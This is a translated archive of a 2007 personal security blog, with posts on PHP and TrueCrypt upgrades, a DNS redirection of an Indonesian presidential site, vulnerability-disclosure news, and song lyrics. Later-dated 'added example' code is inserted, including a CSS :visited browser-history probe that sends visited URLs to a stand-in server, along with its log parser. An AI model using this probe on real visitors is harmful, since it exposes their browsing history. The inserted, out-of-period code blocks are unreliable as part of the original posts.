Friday, March 30, 2007

Goodbye IT World !

Today I am leaving the IT world and entering another field.

Many great things have come to me in the IT world, and I have also enjoyed great relationships with many friends during my days there. But things change, and I am going to pursue other things outside the IT world.

I will be entering "silent" mode in blogging. You may not see new blog posts from me. I will try my best to write a blog entry whenever I can.

I wish you all the best of luck and have a great life.

Wednesday, March 28, 2007

When You Believe

Many nights we've prayed
With no proof anyone could hear
In our hearts a hopeful song
We barely understood

Now we are not afraid
Although we know there's much to fear
We were moving mountains long
Before we knew we could

There can be miracles, when you believe
Though hope is frail, it's hard to kill
Who knows what miracles you can achieve
When you believe, somehow you will
You will when you believe

In this time of fear
When prayers so often prove in vain
Hope seems like the summer birds
So swiftly flown away

Yet now I'm standing here
My heart's so full I can't explain
Seeking faith and speaking words
I never thought I'd say

There can be miracles, when you believe
Though hope is frail, it's hard to kill
Who knows what miracles you can achieve
When you believe, somehow you will
You will when you believe

They don't always happen when you ask
(Oh)
And it's easy to give in to your fears
(Oh...Ohhhh)
But when you're blinded by your pain
Can't see your way straight through the rain
Small but still, resilient voice
Says love is very near
(Ohhh)

There can be miracles
(Miracles)
When you believe
(Lord, when you believe)
Though hope is frail
(Though hope is frail)
It's hard to kill
(Hard to kill, Ohhh)
Who knows what miracles you can achieve
When you believe, somehow you will (somehow, somehow)
somehow you will
You will when you believe

You will when you believe
You will when you believe
Just believe...just believe
You will when you believe

Source: When You Believe - Mariah Carey & Whitney Houston

I Will Win, I Will Lose

In the dreams I dreamed as a child
I lived my life as a king
My days were filled with sunshine
And there was never any pain

I will win, I will lose
I will live my life
I will have to make my way on my own
I will win, I will lose
I will create my own path
I will play the game of life

I've had brief moments of joy
Endless moments of boredom
I've had days full of sunshine
I know what pain is...

I will win, I will lose
I will live my life
I will know how to continue on my own
I will win, I will lose
Now I know my path
But I'll play the game of life on my own

A king, I will certainly not be
And yet, I'll live...

I will win, I will lose
I will have light and shadow
But alone I'll have to go on
I will win, I will lose
My life will be
like a long journey to make

I will win, I will lose
I will live my life
I will have to make my way on my own
I will win, I will lose
Now I know my path...
I will win, I will lose
I will play the game...
I will win, I will lose
But alone...

from :
MARIO FRANGOULIS
Vincerò, Perderò
Lyrics: Luisa Zappa Branduardi
Music: Steve Wood

Monday, March 26, 2007

Upgrading TrueCrypt

On March 19, 2007, TrueCrypt version 4.3 was released. There are many new features, improvements and bug fixes in this release, so I think it is time to upgrade my installation.

I downloaded the TrueCrypt package, but they only provide one for openSUSE 10.2 systems. Last time I used the RPM version, it complained about a kernel mismatch. But this time it didn't complain.

Unfortunately, I already have TrueCrypt installed from the source package, so I need to remove that first before I install the newer version. To make matters worse, the TrueCrypt package doesn't come with an uninstaller, so I had to read the installer script and reverse the installation process to create an uninstallation script. This uninstallation script is very simple: it removes the three files that were installed by the installation script.

Without further talk, you can download the uninstaller script here.

To remove the previous TrueCrypt that you compiled yourself, just type the following command:

# ./remove-truecrypt.sh

And you're done.

Computer Virtualization in Java

Researchers at Oxford have built an x86 emulator that runs purely on Java, making it ideal for security researchers who want to analyze and archive viruses, host honeypots and defend themselves against buggy or malicious software without hosing their machines. The JPC also emulates a host of other environments, giving technophiles the ability to play Asteroids and other software that's sat on shelves for years collecting dust.

Here are several key features of JPC :
  • Cross-Platform
JPC is completely implemented in Java, so it works seamlessly across all major computing platforms, including Windows, Linux and MacOS. JPC even works on non-x86 based hardware like ARM and SPARC.
  • Secure
JPC comes with the assured security of being run entirely within the Java sandbox. This means that the emulated hardware is completely isolated from the underlying hardware and cannot damage or interfere with it in any way.
  • Flexible
With JPC, you have complete configuration control with virtual peripherals and software libraries. And if you mess up, you only mess up your virtual PC. Just delete your disk images and start again.

Tuesday, March 20, 2007

Was President SBY's Website "Hacked"?

I learned about the "hacking" of President SBY's website from a private television station on Saturday, March 17, 2007. I got the information from the running news ticker, with the headline "Situs Presiden SBY di-hack" (President SBY's website hacked). Detik has also run this story under the headline "Situs Presiden SBY Dibobol" (President SBY's website broken into).

I then asked several colleagues whether this report was true, and they confirmed it, but they also explained that what was broken into was not the server hosting President SBY's website; rather, the attacker managed to get into the server management system and change the IP address information for President SBY's website, so that when we access the site we are redirected to another site.

For example, suppose the IP address of President SBY's website (www.presidensby.info) should be 111.222.111.222, but the attacker changed it to 222.111.222.111. Then when we access the site using the address www.presidensby.info, we are directed to 222.111.222.111 and not to 111.222.111.222.

This has also been confirmed by the coordinator of the team managing the President's website, Anjar Ari Nugroho, in the Detik story "Situs SBY Bobol Bukan Karena Masalah di Server" (SBY's site broken into, but not because of a problem on the server).

Here are some conclusions I can draw (they may be wrong, since I know neither the security architecture of President SBY's website nor the full story of this incident):
  • the web server handling President SBY's website was NOT BROKEN INTO
  • the DNS server handling www.presidensby.info was also NOT BROKEN INTO
  • the perpetrator changed the IP address information for www.presidensby.info so that it was redirected to another address he had set up beforehand.
In my opinion the perpetrator seems to have good knowledge, since he was able to find the weak point of the site.

This incident reminds me of the slogan in the IT security world: security is as strong as the weakest link; a system is only as secure as its weakest link.
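Since the attack was a change to the address record rather than a break-in, the practical defence is to notice the record changing. Here is an added example (not part of the original post, and not anything from the Detik stories or the site's operators) of a check that compares live DNS answers with a pinned baseline and tells a change in the zone itself apart from a tampered resolver. The resolvers are injected as plain functions so it runs offline; the nameserver names are made up, and the two addresses are the illustrative ones used above.

```python
"""Added example (not from the original post): catch the redirection described
above by comparing live DNS answers with a pinned baseline.

Resolvers are injected as plain functions so this runs offline; in production
wire `authoritative` to a query against the zone's own nameservers and
`recursive` to the resolver your users actually use. Names, addresses and
nameserver names below are either the illustrative ones from the post or
constructed for this example.
"""
from typing import Callable, Dict, Iterable, List, Set, Tuple

Key = Tuple[str, str]                          # (owner name, record type)
Resolver = Callable[[str, str], Iterable[str]]
Drift = Tuple[str, str, Set[str], Set[str]]    # name, type, expected, observed

# Baseline captured while the site was known to be correct. 111.222.111.222 is
# the illustrative "correct" address from the post; the NS names are made up.
BASELINE: Dict[Key, Set[str]] = {
    ("www.presidensby.info", "A"): {"111.222.111.222"},
    ("presidensby.info", "NS"): {"ns1.example.net.", "ns2.example.net."},
}


def make_resolver(table: Dict[Key, Set[str]]) -> Resolver:
    """Turn a (name, type) -> rdata table into a resolver function (offline stand-in)."""
    def resolve(name: str, rrtype: str) -> Iterable[str]:
        return table.get((name.rstrip(".").lower(), rrtype.upper()), set())
    return resolve


def find_drift(baseline: Dict[Key, Set[str]], resolve: Resolver) -> List[Drift]:
    """Return one entry per baseline record whose live answer differs from it.

    A missing answer (empty set) counts as drift too: a deleted record or a
    broken zone is as bad as a redirected one."""
    drift: List[Drift] = []
    for (name, rrtype), expected in sorted(baseline.items()):
        observed = set(resolve(name, rrtype))
        if observed != expected:
            drift.append((name, rrtype, expected, observed))
    return drift


def classify_incident(baseline: Dict[Key, Set[str]], authoritative: Resolver,
                      recursive: Resolver) -> Tuple[str, List[Drift]]:
    """Tell the two ways a name can end up pointing elsewhere apart.

    "zone-changed": the zone's own authoritative servers disagree with the
        baseline. This is the case the post describes: the attacker edited
        the address through the management interface, so every resolver in
        the world faithfully serves the wrong answer.
    "resolver-tampered": the authoritative answer is still right but the
        recursive resolver returns something else (cache poisoning, a rogue
        resolver on the path, a hosts-file change on the client).
    """
    auth_drift = find_drift(baseline, authoritative)
    if auth_drift:
        return "zone-changed", auth_drift
    rec_drift = find_drift(baseline, recursive)
    if rec_drift:
        return "resolver-tampered", rec_drift
    return "clean", []


if __name__ == "__main__":
    # Constructed scenario: the A record was changed at the source to the
    # post's illustrative "wrong" address, so both resolvers return it.
    hijacked = dict(BASELINE)
    hijacked[("www.presidensby.info", "A")] = {"222.111.222.111"}
    status, drift = classify_incident(
        BASELINE, make_resolver(hijacked), make_resolver(hijacked))
    print(status)
    for name, rrtype, expected, observed in drift:
        print(f"  {name} {rrtype}: expected {sorted(expected)}, got {sorted(observed)}")
```

Pin the NS records as well as the A record: an attacker who can edit the zone at the registrar can also re-delegate it, and that shows up as NS drift before anything else does.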

Intrusion Detection RFCs

There are now three RFCs regarding Intrusion Detection :

Thursday, March 15, 2007

Upgrading to PHP 5.2.x

I had been planning to upgrade my PHP to version 5.2.1 for several weeks, but I couldn't find the spare time to do it until last night.

I upgraded the following packages (libedit is a new install):

# rpm -Uvh php5-5.2.1-15.1.i586.rpm apache2-mod_php5-5.2.1-15.1.i586.rpm php5-gd-5.2.1-15.1.i586.rpm php5-mysql-5.2.1-15.1.i586.rpm php5-zlib-5.2.1-15.1.i586.rpm php5-pdo-5.2.1-15.2.i586.rpm php5-fastcgi-5.2.1-15.2.i586.rpm libedit-2.10.snap20061228-6.1.i586.rpm

After successfully upgrading those packages, I started my Apache webserver:
# rcapache2 start


Then I launched my browser and accessed the test file (index.php). Its content is only a call to the phpinfo() function.

Unfortunately, I could only see a blank page.

I checked the error log and access log, but I couldn't find any error messages.

Next I checked the PHP configuration (/etc/php5/apache/php.ini).

After looking through about 11% of the configuration file, I found the cause of this error. It looks like the new configuration turns off short_open_tag.


There are two things I can do to fix this:

- I can turn the short_open_tag setting back on:

short_open_tag = On

or

- I can change my PHP code to use the recommended open tag ("<?php") instead of the short one ("<?").

After editing my PHP code, I restarted the Apache server:

# rcapache2 restart

And now here is my PHP test page :


BTW, I just learned that this version comes with Suhosin. Yihaaa.
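As an added example (not code from the original post), here is a small scanner that finds the PHP lines which stop working once short_open_tag is Off, and rewrites them to the full tag. It assumes PHP 5.2 behaviour, where the "<?=" echo shorthand is governed by short_open_tag as well (that only changed in PHP 5.4, where "<?=" became always available); the sample source is constructed.

```python
"""Added example (not from the original post): find PHP files that depend on
short_open_tag, which is exactly what produced the blank page above.

With short_open_tag = Off, a bare "<?" is no longer recognised, so the whole
block is sent to the browser as text. On PHP 5.2 (the version installed
above) the "<?=" echo shorthand is controlled by the same setting; it only
became always-available in PHP 5.4. "<?xml" prologs are left alone: with the
setting Off they are emitted literally, which is what you want and the usual
reason the setting is recommended Off. The sample source is constructed."""
import re
from typing import List, Tuple

# Matches "<?" that is neither "<?php" nor "<?xml"; group 1 captures the "="
# of the echo shorthand so callers can treat it separately.
_OPEN_TAG = re.compile(r"<\?(?!php\b|xml\b)(=?)")


def find_short_tags(source: str, echo_tag_always_on: bool = False) -> List[Tuple[int, str]]:
    """Return (1-based line number, stripped line) for each line that needs short_open_tag.

    Pass echo_tag_always_on=True on PHP >= 5.4, where "<?=" no longer depends on it."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in _OPEN_TAG.finditer(line):
            if m.group(1) == "=" and echo_tag_always_on:
                continue
            hits.append((lineno, line.strip()))
            break
    return hits


def rewrite_short_tags(source: str) -> str:
    """Rewrite "<?" to "<?php" and "<?=" to "<?php echo", inserting a space
    when the tag is immediately followed by code."""
    def repl(m):
        tag = "<?php echo" if m.group(1) == "=" else "<?php"
        end = m.end()
        if end < len(source) and not source[end].isspace():
            tag += " "
        return tag
    return _OPEN_TAG.sub(repl, source)


# Constructed sample mixing every form of open tag.
SAMPLE = """<?xml version="1.0"?>
<html><body>
<? phpinfo(); ?>
<?=$title?>
<?php echo "ok"; ?>
<?
echo "multi";
?>
</body></html>
"""

if __name__ == "__main__":
    for lineno, text in find_short_tags(SAMPLE):
        print(f"line {lineno}: {text}")
    print(rewrite_short_tags(SAMPLE))
```

Run find_short_tags over every .php file in the document root before flipping the setting; leaving short_open_tag = On just to avoid the edit keeps PHP trying to parse any "<?xml" prolog your templates emit.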

Paper : Case of Mistaken Identity

University of Washington researchers Kris Erickson and Philip Howard have an interesting new paper out, "A Case of Mistaken Identity? News Accounts of Hacker and Organizational Responsibility for Compromised Digital Records, 1980–2006." This is a great survey of the dramatic explosion in reports of breaches. A couple of great quotes:
One important outcome of the legislation is improved information about the types of security breaches. Many of the news stories between 1984 and 2004 report paltry details, with sources being off the record and vague estimates of the severity of the security breach. Since mandatory reporting legislation in many states, most news coverage provides more substantive details. In 2006, only 10 of the 257 news stories were unable to make some attribution of responsibility for a security breach. (Emphasis added.)

Tuesday, March 13, 2007

Running A Linux System on A Windows Machine

If you want to run a Linux system on a Windows platform but you don't want to deal with partitioning and formatting the hard disk, fortunately you can do so with QEMU.


Here is the official information about QEMU:

QEMU is a generic and open source machine emulator and virtualizer.

When used as a machine emulator, QEMU can run OSes and programs made for one machine (e.g. an ARM board) on a different machine (e.g. your own PC). By using dynamic translation, it achieves very good performance.

When used as a virtualizer, QEMU achieves near native performance by executing the guest code directly on the host CPU. A host driver called the QEMU accelerator (also known as KQEMU) is needed in this case. The virtualizer mode requires that both the host and guest machine use x86 compatible processors.

Interested ?

If yes, just download the QEMU package for Windows. As of today, the latest version is 0.9.0.

After successfully downloading the package, just extract it to a drive (C, D, or whatever you like) and it will create a folder automatically.

Next you need a Linux system in ISO format. The above package already includes a small Linux system. To test it, just run qemu-win.bat from the command line. I leave the procedure for this as an exercise for the reader. :D

In this post, I am going to use the Network Security Toolkit (NST) ISO image in QEMU. You can use another Linux system if you want.

Here are the steps to boot the NST ISO from QEMU:
  • Store the Linux image file in the same folder as QEMU. This is only for ease of use. :D
  • Edit the qemu-win.bat file to the following :
  • Run the qemu-win.bat file by typing :
qemu-win
  • It will then display the following :

We've managed to run a Linux system on Windows.

Happy QEMU-ing.

BlackHat DC 2007 Presentations

Friday, March 09, 2007

Pictures from Information Security Awareness Day 2007

I've uploaded several pictures taken by Pak Marsel during Information Security Awareness Day (March 7, 2007) at the BPPT building.

You can view the pictures here.

Enjoy the view.

Hardware-based rootkit detection proven unreliable

From ZDNet :

For years, we've been convinced by companies like Komoku and BBN Technologies that hardware-based RAM acquisition is the most reliable and secure way to sniff out the presence of a sophisticated rootkit on a compromised machine.

Joanna Rutkowska, a security researcher at COSEINC Malware Labs, an elite hacker who specializes in offensive rootkit research, has found several ways to manipulate the results given to hardware-based solutions (PCI cards or FireWire bus).

At this year's Black Hat DC conference, Rutkowska demonstrated three different attacks against AMD64 based systems, showing how the image of volatile memory (RAM) can be made different from the real contents of the physical memory as seen by the CPU.
You can find out more about this from Rutkowska's presentation slides.

Thursday, March 08, 2007

Experiment Computer Networking using Netkit

Yesterday, a friend of mine who goes by the name "Olyx" informed me about a cool networking tool called Netkit. At that time he didn't give much information about it; he just told me about Netkit.

After arriving home from a meeting, I read the Netkit introduction document. I finally figured out that Netkit is a tool to create computer networking environments. Netkit uses User Mode Linux.

With Netkit we can set up and experiment with routers, switches, computers, etc. We can create a computer networking lab at low cost and with little effort. There is no longer any reason you can't learn computer networking because of the price.

If you are interested in Netkit, just download the following:
- Introduction slide
- Tutorial slide
- Netkit packages :
- Basic Topics slides (single host, two hosts, static routing)
- Application Level Topics slides (DNS and Email)

Tuesday, March 06, 2007

Vista Research Papers

Symantec has released the first three of six technical research papers evaluating Windows Vista security components.

The research papers cover a range of Vista security mechanisms in depth, from its Address Space Layout Randomization (ASLR) technology, designed to thwart the exploitation of heap overflows and certain other malware attack methods, to the buffer overflow protection in the Visual Studio C++ compiler used to build Vista, and an evaluation of how well legacy malware works on Vista.

The first paper is designed for technical managers and other IT professionals who want to understand the effectiveness of Windows Vista’s new security technologies. This paper will be valuable to decision makers who need to get a practical understanding of Windows Vista’s true security posture.

Threats from Within

From DarkReading :

Enterprises are leaking an increasing amount of data from the inside, and they aren't sure what to do about it.

Those are the conclusions of two new studies -- one from the Ponemon Institute and one from Enterprise Strategy Group -- being published today. Both of the reports suggest that enterprises should be shifting their security attention from the outside to the inside.

The new Enterprise Strategy Group report found that one third of the enterprises surveyed had experienced a loss of sensitive data in the last 12 months, while another 11 percent were unsure whether a breach occurred.

According to the new Ponemon study, nearly 60 percent of U.S.-based businesses and government agencies believe they are unable to effectively assess or quantify insider threat risks within their organizations, leaving them open to privacy breaches, failed audits, and potential fraud or misuse of data.

Ferret : A Data Seepage Tool

David Maynor of Errata Security has just released a tool called Ferret for data seepage at BlackHat DC 2007.

According to Ferret's page, data seepage is the bits of benign data that people willingly broadcast to the world (as opposed to "leakage", which is data people want to hide from the world).

An example of data seepage is what happens when you power on your computer. It broadcasts to the world the list of WiFi access points you've got cached on your computer, the previous IP address you used (requested via DHCP), your NetBIOS name, your login ID, and a list of servers (via NetBIOS requests) you want to connect to.

You can get Ferret here.

Friday, March 02, 2007

MOPB Has Begun

Starting March 1, 2007, the Month of PHP Bugs has begun. Here is an excerpt about this project:
This initiative is an effort to improve the security of PHP. However we will not concentrate on problems in the PHP language that might result in insecure PHP applications, but on security vulnerabilities in the PHP core. During March 2007 old and new security vulnerabilities in the Zend Engine, the PHP core and the PHP extensions will be disclosed on a day by day basis. We will also point out necessary changes in the current vulnerability management process used by the PHP Security Response Team.
As of today, they have released five bugs :
In PHP 4 userland code is able to overflow the internal 16bit zval reference counter by creating many references to a variable. This leads to an exploitable double dtor condition.
A deep recursion of PHP userland code will exhaust all available stack which leads to a sometimes remotely triggerable crash.
The destruction of deeply nested PHP arrays will exhaust all available stack which leads to remotely triggerable crashes.
During unserialisation of user supplied data that contains a lot of references to a variable the internal 16bit zval reference counter can overflow. This leads to an exploitable double dtor condition.
Deserialisation of malformed PHP arrays from within unserialize() might result in a tight endless loop exhausting CPU resources on 64bit systems.

Kind readers, please fasten your seatbelts during this month, especially if you are using PHP.

Thursday, March 01, 2007

Learning Security using DamnVulnerableLinux

If you want to learn security by doing the actual "hacking", there is good news for you.

Thorsten Schneider of the International Institute for Training, Assessment, and Certification (IITAC) and Secure Software Engineering (S²e) in cooperation with Kryshaam from the French Reverse Engineering Team has released Damn Vulnerable Linux (DVL).

Here is a description of DVL:

Damn Vulnerable Linux (DVL) is everything a good Linux distribution isn't. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn't built to run on your desktop -- it's a learning tool for security students.

DVL is a live CD available as a 150MB ISO. It's based on the popular mini-Linux distribution Damn Small Linux (DSL), not only for its minimal size, but also for the fact that DSL uses a 2.4 kernel, which makes it easier to offer vulnerable elements that might not work under the 2.6 kernel. It contains older, easily breakable versions of Apache, MySQL, PHP, and FTP and SSH daemons, as well as several tools available to help you compile, debug, and break applications running on these services, including GCC, GDB, NASM, strace, ELF Shell, DDD, LDasm, LIDa, and more.
You will also get video tutorials with a DVL overview and the first lesson on buffer overflows. But you have to download them separately, because they don't come with the distro.

At this moment the site can't be accessed; it seems their system is experiencing technical problems.

I am looking forward to their next releases, which will include many wonderful tools such as Metasploit, and of course more tutorials would be great.

Tool to Steal Browser History

pdp has designed a new tool to steal browser history, called Noscript HScan. The interesting thing about this tool is that it doesn't need JavaScript to be turned on.

Up until now we thought that by disabling JavaScript we'd be safe. But apparently that's no longer sufficient; now we need to disable CSS too. :D
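To make concrete what "no JavaScript needed" means, here is an added example of the CSS-only technique. It is not pdp's Noscript HScan and not code from the original post: a generator for the probe page, and the log parser the probing server needs to turn beacon hits back into visited URLs. The beacon host, path and parameter name are assumptions, and the log lines are constructed. It is also a historical technique: browsers later closed this channel (Firefox from version 4, and the others around the same time) by restricting what :visited may style and by no longer fetching resources based on it, so today the generated page is useful as a regression test for that mitigation rather than as a working attack.

```python
"""Added example (not pdp's Noscript HScan and not code from the original
post): the CSS-only history probe the post is talking about, plus the log
parser the probing server needs.

Every candidate URL gets a link with a per-link a:visited rule whose
background image lives on the probing server. Browsers of 2007 applied the
rule, and therefore fetched the image, only for links already in the history,
so the server's access log spelled out which candidate URLs the visitor had
been to, with no JavaScript involved. The beacon host, path and parameter name
are assumptions; the log lines are constructed.

Caveat: browsers later restricted what :visited may change and stopped loading
resources based on it, so treat this as a regression test for that mitigation,
not as a working attack."""
import re
from html import escape
from typing import List, Tuple
from urllib.parse import parse_qs, quote, urlsplit

BEACON = "http://probe.example/hit"   # assumed logging endpoint, parameter "u"

# Client address and request target from a Common Log Format line.
_LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) HTTP/[\d.]+"')


def build_probe_page(candidates: List[str]) -> str:
    """Return an HTML page whose only active content is the CSS :visited rules."""
    rules: List[str] = []
    links: List[str] = []
    for i, url in enumerate(candidates):
        # One id per link so each visited match fires its own, identifiable beacon.
        beacon = f"{BEACON}?u={quote(url, safe='')}"
        rules.append(f'#l{i}:visited {{ background-image: url("{beacon}"); }}')
        links.append(f'<a id="l{i}" href="{escape(url, quote=True)}">&nbsp;</a>')
    return (
        "<!doctype html>\n<html><head><style>\n"
        "a { display: block; width: 1px; height: 1px; overflow: hidden; }\n"
        + "\n".join(rules)
        + "\n</style></head><body>\n"
        + "\n".join(links)
        + "\n</body></html>\n"
    )


def visited_from_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Recover (client address, visited URL) pairs from beacon hits in an
    access log in Common Log Format; every other request is ignored."""
    beacon_path = urlsplit(BEACON).path
    found: List[Tuple[str, str]] = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(2)
        parts = urlsplit(target)
        if parts.path != beacon_path:
            continue
        for url in parse_qs(parts.query).get("u", []):
            found.append((client, url))
    return found


# Constructed access-log excerpt: one beacon hit, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Mar/2007:10:00:01 +0700] "GET /hit?u=http%3A%2F%2Fbank.example%2Flogin HTTP/1.1" 200 43',
    '10.0.0.7 - - [01/Mar/2007:10:00:01 +0700] "GET /favicon.ico HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    print(build_probe_page(["http://bank.example/login", "https://mail.example/"]))
    print(visited_from_log(SAMPLE_LOG))
```

Note that the generated page contains no script element at all; the only thing a NoScript-style defence could have blocked here is the stylesheet, which is the point the post makes.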